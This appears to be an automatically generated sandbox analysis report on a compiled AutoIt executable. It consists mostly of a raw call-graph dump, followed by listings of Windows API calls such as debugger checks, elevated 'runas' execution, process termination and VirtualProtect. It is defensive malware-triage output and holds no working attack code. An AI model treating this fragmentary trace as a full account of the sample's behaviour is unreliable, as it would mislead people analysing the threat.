88139 40a0af 88117->88139 88625 40c790 VariantClear moneypunct 88117->88625 88636 45e737 90 API calls 3 library calls 88118->88636 88119 4299d9 88123 408f40 VariantClear 88119->88123 88121->88117 88122 429abd 88122->87042 88128 4299e2 88123->88128 88124 429d88 88617 453443 52 API calls 88124->88617 88127->88085 88127->88086 88127->88088 88127->88091 88127->88096 88127->88103 88127->88105 88127->88118 88127->88119 88127->88122 88130 42a452 88127->88130 88134 40a780 192 API calls 88127->88134 88611 40c4e0 192 API calls 88127->88611 88613 40ba10 52 API calls 2 library calls 88127->88613 88614 40e270 VariantClear moneypunct 88127->88614 88612 410c60 VariantClear moneypunct 88128->88612 88130->88081 88132->88072 88134->88127 88135 402780 52 API calls 88135->88154 88137 408f40 VariantClear 88168 40a162 moneypunct _memmove 88137->88168 88138 41130a 51 API calls __cinit 88138->88154 88140 40a11b 88139->88140 88142 42a4b4 VariantClear 88139->88142 88139->88168 88146 40a12d moneypunct 88140->88146 88626 40e270 VariantClear moneypunct 88140->88626 88141 40a780 192 API calls 88141->88154 88142->88146 88143 401980 53 API calls 88143->88154 88144 408e80 VariantClear 88144->88154 88147 4115d7 52 API calls 88146->88147 88146->88168 88147->88168 88148 408e80 VariantClear 88148->88168 88150 44a801 52 API calls 88150->88154 88151 42a74d VariantClear 88151->88168 88152 40a368 88155 42aad4 88152->88155 88163 40a397 88152->88163 88153 4115d7 52 API calls 88153->88154 88154->88097 88154->88116 88154->88132 88154->88135 88154->88138 88154->88141 88154->88143 88154->88144 88154->88150 88154->88153 88154->88156 88160 409c95 88154->88160 88621 45f508 52 API calls 88154->88621 88622 403e10 53 API calls 88154->88622 88629 46fe90 VariantClear VariantClear moneypunct 88155->88629 88623 47390f VariantClear 88156->88623 88157 42a7e4 VariantClear 88157->88168 88158 42a886 VariantClear 88158->88168 88160->87042 88161 40a3ce 88175 40a3d9 moneypunct 88161->88175 88630 40b400 VariantClear VariantClear moneypunct 88161->88630 88162 40e270 VariantClear 88162->88168 88163->88161 88188 40a42c moneypunct 88163->88188 88609 40b400 VariantClear VariantClear moneypunct 88163->88609 88166 4115d7 52 API calls 88166->88168 88167 42abaf 88171 42abd4 VariantClear 88167->88171 88182 40a4ee moneypunct 88167->88182 88168->88137 88168->88148 88168->88151 88168->88152 88168->88155 88168->88157 88168->88158 88168->88162 88168->88166 88170 4115d7 52 API calls 88168->88170 88627 470870 52 API calls 88168->88627 88628 44ccf1 VariantClear moneypunct 88168->88628 88169 40a4dc 88169->88182 88632 40e270 VariantClear moneypunct 88169->88632 88172 42a5a6 VariantInit VariantCopy 88170->88172 88171->88182 88172->88168 88177 42a5c6 VariantClear 88172->88177 88173 42ac4f 88181 42ac79 VariantClear 88173->88181 88186 40a546 moneypunct 88173->88186 88176 40a41a 88175->88176 88179 42ab44 VariantClear 88175->88179 88175->88188 88176->88188 88631 40e270 VariantClear moneypunct 88176->88631 88177->88168 88178 40a534 88178->88186 88633 40e270 VariantClear moneypunct 88178->88633 88179->88188 88181->88186 88182->88173 88182->88178 88183 42ad28 88189 42ad4e VariantClear 88183->88189 88194 40a583 moneypunct 88183->88194 88186->88183 88187 40a571 88186->88187 88187->88194 88634 40e270 VariantClear moneypunct 88187->88634 88188->88167 88188->88169 88189->88194 88191 40a650 moneypunct 88191->87042 88192 42ae0e VariantClear 88192->88194 88194->88191 88194->88192 88635 40e270 VariantClear moneypunct 88194->88635 88195->87042 88196->87042 88197->87042 88198->86990 88199->86996 88200->87042 88201->87042 88202->87042 88203->87042 88204->87047 88205->87047 88206->87047 88207->87047 88208->87047 88209->87047 88210->87047 88212 403cdf 88211->88212 88213 408f40 VariantClear 88212->88213 88214 403ce7 88213->88214 88214->87034 88215->87047 88216->87047 88217->87042 88218->86987 88220 408e94 88219->88220 88221 408e88 88219->88221 88223 45340c 85 API calls 88220->88223 88222 408f40 VariantClear 88221->88222 88222->88220 88223->87952 88224->87956 88225->87958 88226->87960 88227->87943 88228->87951 88229->87972 88230->87969 88231->87989 88232->87990 88233->87951 88235 40a7a6 88234->88235 88236 40ae8c 88234->88236 88238 4115d7 52 API calls 88235->88238 88277 41130a 51 API calls __cinit 88236->88277 88271 40a7c6 moneypunct _memmove 88238->88271 88239 40a86d 88240 40abd1 88239->88240 88256 40a878 moneypunct 88239->88256 88282 45e737 90 API calls 3 library calls 88240->88282 88241 401b10 52 API calls 88241->88271 88243 40bc10 53 API calls 88243->88271 88244 40b5f0 89 API calls 88244->88271 88245 408e80 VariantClear 88245->88271 88246 42b791 VariantClear 88246->88271 88247 42ba2d VariantClear 88247->88271 88248 408f40 VariantClear 88248->88256 88249 40a884 moneypunct 88249->87989 88250 40e270 VariantClear 88250->88271 88251 42b459 VariantClear 88251->88271 88253 42b6f6 VariantClear 88253->88271 88254 408cc0 185 API calls 88254->88271 88255 42bc5b 88255->87989 88256->88248 88256->88249 88257 42bbf5 88283 45e737 90 API calls 3 library calls 88257->88283 88258 42bb6a 88285 44b92d VariantClear 88258->88285 88259 4115d7 52 API calls 88262 42b5b3 VariantInit VariantCopy 88259->88262 88261 408f40 VariantClear 88261->88271 88265 42b5d7 VariantClear 88262->88265 88262->88271 88265->88271 88266 4115d7 52 API calls 88266->88271 88268 42bc37 88284 45e737 90 API calls 3 library calls 88268->88284 88271->88239 88271->88240 88271->88241 88271->88243 88271->88244 88271->88245 88271->88246 88271->88247 88271->88250 88271->88251 88271->88253 88271->88254 88271->88257 88271->88258 88271->88259 88271->88261 88271->88266 88271->88268 88274 4530c9 VariantClear 88271->88274 88278 45308a 53 API calls 88271->88278 88279 470870 52 API calls 88271->88279 88280 457f66 87 API calls __write_nolock 88271->88280 88281 472f47 127 API calls 88271->88281 88272 42bc48 88272->88258 88273 408f40 VariantClear 88272->88273 88273->88258 88274->88271 88275->87977 88276->87981 88277->88271 88278->88271 88279->88271 88280->88271 88281->88271 88282->88258 88283->88258 88284->88272 88285->88255 88286->87997 88287->88000 88288->88017 88289->88015 88290->88005 88291->88039 88292->88052 88293->88039 88294->88049 88295->88039 88296->88049 88297->88034 88298->88049 88299->88037 88300->88049 88301->88049 88302->88032 88304 4289d2 88303->88304 88305 408db3 88303->88305 88335 45e737 90 API calls 3 library calls 88304->88335 88333 40bec0 90 API calls 88305->88333 88308 408dc9 88309 4289e5 88308->88309 88312 428a05 88308->88312 88314 40a780 192 API calls 88308->88314 88315 408e64 88308->88315 88317 408f40 VariantClear 88308->88317 88318 408e5a 88308->88318 88334 40ba10 52 API calls 2 library calls 88308->88334 88336 45e737 90 API calls 3 library calls 88309->88336 88313 408f40 VariantClear 88312->88313 88313->88318 88314->88308 88316 408f40 VariantClear 88315->88316 88316->88318 88317->88308 88318->88059 88320 408f40 VariantClear 88319->88320 88321 403d20 88320->88321 88322 403cd0 VariantClear 88321->88322 88323 403d4d 88322->88323 88326 4013c0 52 API calls 88323->88326 88337 45e17d 88323->88337 88347 4755ad 88323->88347 88350 467897 88323->88350 88394 40de10 88323->88394 88399 46e91c 88323->88399 88324 403d76 88324->88056 88324->88066 88326->88324 88331->88056 88332->88058 88333->88308 88334->88308 88335->88309 88336->88312 88338 45e198 88337->88338 88339 45e19c 88338->88339 88340 45e1b8 88338->88340 88341 408f40 VariantClear 88339->88341 88342 45e1cc 88340->88342 88343 45e1db FindClose 88340->88343 88344 45e1a4 88341->88344 88345 45e1d9 moneypunct 88342->88345 88402 44ae3e 88342->88402 88343->88345 88344->88324 88345->88324 88415 475077 88347->88415 88349 4755c0 88349->88324 88353 4678bb 88350->88353 88351 467954 88352 4115d7 52 API calls 88351->88352 88380 467964 88351->88380 88354 467989 88352->88354 88353->88351 88531 45340c 85 API calls 88353->88531 88357 467995 88354->88357 88535 40da60 53 API calls 88354->88535 88356 4678f6 88358 413a0e __wsplitpath 46 API calls 88356->88358 88360 4533eb 85 API calls 88357->88360 88361 4678fc 88358->88361 88362 4679b7 88360->88362 88363 401b10 52 API calls 88361->88363 88519 40de40 88362->88519 88365 46790c 88363->88365 88532 40d200 52 API calls 2 library calls 88365->88532 88368 4679c7 GetLastError 88371 403cd0 VariantClear 88368->88371 88369 467a05 88372 467a2c 88369->88372 88373 467a4b 88369->88373 88370 467917 88370->88351 88533 4339fa GetFileAttributesW FindFirstFileW FindClose 88370->88533 88374 4679dc 88371->88374 88376 4115d7 52 API calls 88372->88376 88377 4115d7 52 API calls 88373->88377 88378 4679e6 88374->88378 88383 44ae3e CloseHandle 88374->88383 88381 467a31 88376->88381 88382 467a49 88377->88382 88385 408f40 VariantClear 88378->88385 88379 467928 88379->88351 88384 46792f 88379->88384 88380->88324 88536 436299 52 API calls 2 library calls 88381->88536 88389 408f40 VariantClear 88382->88389 88383->88378 88534 4335cd 56 API calls 3 library calls 88384->88534 88388 4679ed 88385->88388 88388->88324 88391 467a88 88389->88391 88390 467939 88390->88351 88392 408f40 VariantClear 88390->88392 88391->88324 88393 467947 88392->88393 88393->88351 88395 4115d7 52 API calls 88394->88395 88396 40de23 88395->88396 88397 40da20 CloseHandle 88396->88397 88398 40de2e 88397->88398 88398->88324 88549 46e785 88399->88549 88401 46e92f 88401->88324 88404 44ae4b moneypunct 88402->88404 88405 443fdf 88402->88405 88404->88345 88410 40da20 88405->88410 88407 443feb 88414 4340db CloseHandle moneypunct 88407->88414 88409 444001 88409->88404 88411 40da37 88410->88411 88412 40da29 88410->88412 88411->88412 88413 40da3c CloseHandle 88411->88413 88412->88407 88413->88407 88414->88409 88466 4533eb 88415->88466 88418 4750ee 88421 408f40 VariantClear 88418->88421 88419 475129 88470 4646e0 88419->88470 88426 4750f5 88421->88426 88422 47515e 88423 475162 88422->88423 88460 47518e 88422->88460 88424 408f40 VariantClear 88423->88424 88455 475169 88424->88455 88425 475357 88427 475365 88425->88427 88428 4754ea 88425->88428 88426->88349 88504 44b3ac 57 API calls 88427->88504 88510 464812 91 API calls 88428->88510 88432 4754fc 88433 475374 88432->88433 88435 475508 88432->88435 88483 430d31 88433->88483 88434 4533eb 85 API calls 88434->88460 88436 408f40 VariantClear 88435->88436 88439 47550f 88436->88439 88439->88455 88440 475388 88490 4577e9 88440->88490 88442 47539e 88498 410cfc 88442->88498 88443 475480 88445 408f40 VariantClear 88443->88445 88445->88455 88447 4753d4 88506 40e830 53 API calls 88447->88506 88448 4753b8 88505 45e737 90 API calls 3 library calls 88448->88505 88451 4753c5 GetCurrentProcess TerminateProcess 88451->88447 88452 4753e3 88464 475406 88452->88464 88507 40cf00 53 API calls 88452->88507 88453 4754b5 88454 408f40 VariantClear 88453->88454 88454->88455 88455->88349 88460->88425 88460->88434 88460->88443 88460->88453 88460->88460 88502 436299 52 API calls 2 library calls 88460->88502 88503 463ad5 64 API calls __wcsicoll 88460->88503 88462 408e80 VariantClear 88462->88464 88464->88455 88464->88462 88465 408f40 VariantClear 88464->88465 88509 40cf00 53 API calls 88464->88509 88465->88464 88467 453404 88466->88467 88468 4533f8 88466->88468 88467->88418 88467->88419 88468->88467 88513 4531b1 85 API calls 5 library calls 88468->88513 88514 4536f7 53 API calls 88470->88514 88472 4646fc 88515 4426cd 59 API calls _wcslen 88472->88515 88474 464711 88476 40bc70 52 API calls 88474->88476 88482 46474b 88474->88482 88477 46472c 88476->88477 88516 461465 52 API calls _memmove 88477->88516 88479 464741 88480 40c600 52 API calls 88479->88480 88480->88482 88481 464793 88481->88422 88482->88481 88517 463ad5 64 API calls __wcsicoll 88482->88517 88484 430db2 88483->88484 88485 430d54 88483->88485 88484->88440 88486 4115d7 52 API calls 88485->88486 88487 430d74 88486->88487 88488 430da9 88487->88488 88489 4115d7 52 API calls 88487->88489 88488->88440 88489->88487 88491 457a84 88490->88491 88497 45780c _strcat moneypunct _wcslen _wcscpy 88490->88497 88491->88442 88492 443006 57 API calls 88492->88497 88494 4135bb 46 API calls _malloc 88494->88497 88495 45340c 85 API calls 88495->88497 88496 40f6f0 54 API calls 88496->88497 88497->88491 88497->88492 88497->88494 88497->88495 88497->88496 88518 44b3ac 57 API calls 88497->88518 88500 410d11 88498->88500 88499 410da9 VirtualProtect 88501 410d77 88499->88501 88500->88499 88500->88501 88501->88447 88501->88448 88502->88460 88503->88460 88504->88433 88505->88451 88506->88452 88509->88464 88510->88432 88513->88467 88514->88472 88515->88474 88516->88479 88517->88481 88518->88497 88520 40da20 CloseHandle 88519->88520 88521 40de4e 88520->88521 88537 40f110 88521->88537 88524 4264fa 88526 40de84 88546 40e080 SetFilePointerEx SetFilePointerEx 88526->88546 88528 40de8b 88547 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88528->88547 88530 40de90 88530->88368 88530->88369 88531->88356 88532->88370 88533->88379 88534->88390 88535->88357 88536->88382 88538 40f125 CreateFileW 88537->88538 88539 42630c 88537->88539 88541 40de74 88538->88541 88540 426311 CreateFileW 88539->88540 88539->88541 88540->88541 88542 426337 88540->88542 88541->88524 88545 40dea0 55 API calls moneypunct 88541->88545 88548 40df90 SetFilePointerEx SetFilePointerEx 88542->88548 88544 426342 88544->88541 88545->88526 88546->88528 88547->88530 88548->88544 88550 46e7a2 88549->88550 88551 4115d7 52 API calls 88550->88551 88554 46e802 88550->88554 88552 46e7ad 88551->88552 88553 46e7b9 88552->88553 88597 40da60 53 API calls 88552->88597 88559 4533eb 85 API calls 88553->88559 88555 46e7e5 88554->88555 88562 46e82f 88554->88562 88557 408f40 VariantClear 88555->88557 88558 46e7ea 88557->88558 88558->88401 88560 46e7ca 88559->88560 88563 40de40 60 API calls 88560->88563 88561 46e8b5 88590 4680ed 88561->88590 88562->88561 88565 46e845 88562->88565 88566 46e7d7 88563->88566 88568 4533eb 85 API calls 88565->88568 88566->88562 88569 46e7db 88566->88569 88567 46e8bb 88594 443fbe 88567->88594 88577 46e84b 88568->88577 88569->88555 88571 44ae3e CloseHandle 88569->88571 88570 46e87a 88598 4689f4 59 API calls 88570->88598 88571->88555 88574 46e883 88576 4013c0 52 API calls 88574->88576 88578 46e88f 88576->88578 88577->88570 88577->88574 88580 40e0a0 52 API calls 88578->88580 88579 408f40 VariantClear 88582 46e881 88579->88582 88581 46e899 88580->88581 88599 40d200 52 API calls 2 library calls 88581->88599 88584 46e911 88582->88584 88586 40da20 CloseHandle 88582->88586 88584->88401 88585 46e8a5 88600 4689f4 59 API calls 88585->88600 88587 46e903 88586->88587 88589 44ae3e CloseHandle 88587->88589 88589->88584 88591 468100 88590->88591 88592 4680fa 88590->88592 88591->88567 88601 467ac4 55 API calls 2 library calls 88592->88601 88602 443e36 88594->88602 88596 443fd3 88596->88579 88596->88582 88597->88553 88598->88582 88599->88585 88600->88582 88601->88591 88605 443e19 88602->88605 88606 443e26 88605->88606 88607 443e32 WriteFile 88605->88607 88608 443db4 SetFilePointerEx SetFilePointerEx 88606->88608 88607->88596 88608->88607 88609->88161 88610->88079 88611->88127 88612->88191 88613->88127 88614->88127 88615->88099 88616->88124 88617->88090 88618->88094 88619->88100 88620->88154 88621->88154 88622->88154 88623->88116 88624->88130 88625->88117 88626->88146 88627->88168 88628->88168 88629->88161 88630->88175 88631->88188 88632->88182 88633->88186 88634->88194 88635->88194 88636->88130 88637->88084 88638 40d33b8 88652 40d1008 88638->88652 88640 40d346f 88655 40d32a8 88640->88655 88658 40d4498 GetPEB 88652->88658 88654 40d1693 88654->88640 88656 40d32b1 Sleep 88655->88656 88657 40d32bf 88656->88657 88659 40d44c2 88658->88659 88659->88654 88660 42d154 88664 480a8d 88660->88664 88662 42d161 88663 480a8d 192 API calls 88662->88663 88663->88662 88665 480ae4 88664->88665 88666 480b26 88664->88666 88667 480aeb 88665->88667 88668 480b15 88665->88668 88669 40bc70 52 API calls 88666->88669 88670 480aee 88667->88670 88671 480b04 88667->88671 88697 4805bf 192 API calls 88668->88697 88683 480b2e 88669->88683 88670->88666 88673 480af3 88670->88673 88696 47fea2 192 API calls __itow_s 88671->88696 88695 47f135 192 API calls 88673->88695 88675 40e0a0 52 API calls 88675->88683 88678 408f40 VariantClear 88680 481156 88678->88680 88679 480aff 88679->88678 88681 408f40 VariantClear 88680->88681 88682 48115e 88681->88682 88682->88662 88683->88675 88683->88679 88684 401980 53 API calls 88683->88684 88686 40c2c0 52 API calls 88683->88686 88687 480ff5 88683->88687 88688 40e710 53 API calls 88683->88688 88689 40a780 192 API calls 88683->88689 88691 408e80 VariantClear 88683->88691 88698 45377f 52 API calls 88683->88698 88699 45e951 53 API calls 88683->88699 88700 40e830 53 API calls 88683->88700 88701 47925f 53 API calls 88683->88701 88702 47fcff 192 API calls 88683->88702 88684->88683 88686->88683 88703 45e737 90 API calls 3 library calls 88687->88703 88688->88683 88689->88683 88691->88683 88695->88679 88696->88679 88697->88679 88698->88683 88699->88683 88700->88683 88701->88683 88702->88683 88703->88679 88704 42b14b 88711 40bc10 88704->88711 88706 42b159 88707 4096a0 329 API calls 88706->88707 88708 42b177 88707->88708 88722 44b92d VariantClear 88708->88722 88710 42bc5b 88712 40bc24 88711->88712 88713 40bc17 88711->88713 88715 40bc2a 88712->88715 88716 40bc3c 88712->88716 88714 408e80 VariantClear 88713->88714 88717 40bc1f 88714->88717 88718 408e80 VariantClear 88715->88718 88719 4115d7 52 API calls 88716->88719 88717->88706 88720 40bc33 88718->88720 88721 40bc43 88719->88721 88720->88706 88721->88706 88722->88710 88723 425b2b 88728 40f000 88723->88728 88727 425b3a 88729 4115d7 52 API calls 88728->88729 88730 40f007 88729->88730 88731 4276ea 88730->88731 88737 40f030 88730->88737 88736 41130a 51 API calls __cinit 88736->88727 88738 40f039 88737->88738 88739 40f01a 88737->88739 88767 41130a 51 API calls __cinit 88738->88767 88741 40e500 88739->88741 88742 40bc70 52 API calls 88741->88742 88743 40e515 GetVersionExW 88742->88743 88744 402160 52 API calls 88743->88744 88745 40e557 88744->88745 88768 40e660 88745->88768 88750 427674 88755 4276c6 GetSystemInfo 88750->88755 88753 40e5e0 88757 4276d5 GetSystemInfo 88753->88757 88782 40efd0 88753->88782 88754 40e5cd GetCurrentProcess 88789 40ef20 LoadLibraryA GetProcAddress 88754->88789 88755->88757 88760 40e629 88786 40ef90 88760->88786 88763 40e641 FreeLibrary 88764 40e644 88763->88764 88765 40e653 FreeLibrary 88764->88765 88766 40e656 88764->88766 88765->88766 88766->88736 88767->88739 88769 40e667 88768->88769 88770 42761d 88769->88770 88771 40c600 52 API calls 88769->88771 88772 40e55c 88771->88772 88773 40e680 88772->88773 88774 40e687 88773->88774 88775 427616 88774->88775 88776 40c600 52 API calls 88774->88776 88777 40e566 88776->88777 88777->88750 88778 40ef60 88777->88778 88779 40e5c8 88778->88779 88780 40ef66 LoadLibraryA 88778->88780 88779->88753 88779->88754 88780->88779 88781 40ef77 GetProcAddress 88780->88781 88781->88779 88783 40e620 88782->88783 88784 40efd6 LoadLibraryA 88782->88784 88783->88755 88783->88760 88784->88783 88785 40efe7 GetProcAddress 88784->88785 88785->88783 88790 40efb0 LoadLibraryA GetProcAddress 88786->88790 88788 40e632 GetNativeSystemInfo 88788->88763 88788->88764 88789->88753 88790->88788 88791 425b5e 88796 40c7f0 88791->88796 88795 425b6d 88831 40db10 52 API calls 88796->88831 88798 40c82a 88832 410ab0 6 API calls 88798->88832 88800 40c86d 88801 40bc70 52 API calls 88800->88801 88802 40c877 88801->88802 88803 40bc70 52 API calls 88802->88803 88804 40c881 88803->88804 88805 40bc70 52 API calls 88804->88805 88806 40c88b 88805->88806 88807 40bc70 52 API calls 88806->88807 88808 40c8d1 88807->88808 88809 40bc70 52 API calls 88808->88809 88810 40c991 88809->88810 88833 40d2c0 52 API calls 88810->88833 88812 40c99b 88834 40d0d0 53 API calls 88812->88834 88814 40c9c1 88815 40bc70 52 API calls 88814->88815 88816 40c9cb 88815->88816 88835 40e310 53 API calls 88816->88835 88818 40ca28 88819 408f40 VariantClear 88818->88819 88820 40ca30 88819->88820 88821 408f40 VariantClear 88820->88821 88822 40ca38 GetStdHandle 88821->88822 88823 429630 88822->88823 88824 40ca87 88822->88824 88823->88824 88825 429639 88823->88825 88830 41130a 51 API calls __cinit 88824->88830 88836 4432c0 57 API calls 88825->88836 88827 429641 88837 44b6ab CreateThread 88827->88837 88829 42964f CloseHandle 88829->88824 88830->88795 88831->88798 88832->88800 88833->88812 88834->88814 88835->88818 88836->88827 88837->88829 88838 44b5cb 58 API calls 88837->88838 88839 425b6f 88844 40dc90 88839->88844 88843 425b7e 88845 40bc70 52 API calls 88844->88845 88846 40dd03 88845->88846 88852 40f210 88846->88852 88849 40dd96 88850 40ddb7 88849->88850 88855 40dc00 52 API calls 2 library calls 88849->88855 88851 41130a 51 API calls __cinit 88850->88851 88851->88843 88856 40f250 RegOpenKeyExW 88852->88856 88854 40f230 88854->88849 88855->88849 88857 425e17 88856->88857 88858 40f275 RegQueryValueExW 88856->88858 88857->88854 88859 40f2c3 RegCloseKey 88858->88859 88860 40f298 88858->88860 88859->88854 88861 40f2a9 RegCloseKey 88860->88861 88862 425e1d 88860->88862 88861->88854

                                                                                                Executed Functions

                                                                                                Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 004096C1
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • _memmove.LIBCMT ref: 0040970C
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                • _memmove.LIBCMT ref: 00409D96
                                                                                                • _memmove.LIBCMT ref: 0040A6C4
                                                                                                • _memmove.LIBCMT ref: 004297E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 2383988440-0
                                                                                                • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                Strings
                                                                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                • API String ID: 2495805114-3383388033
                                                                                                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                Function 0040E500 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
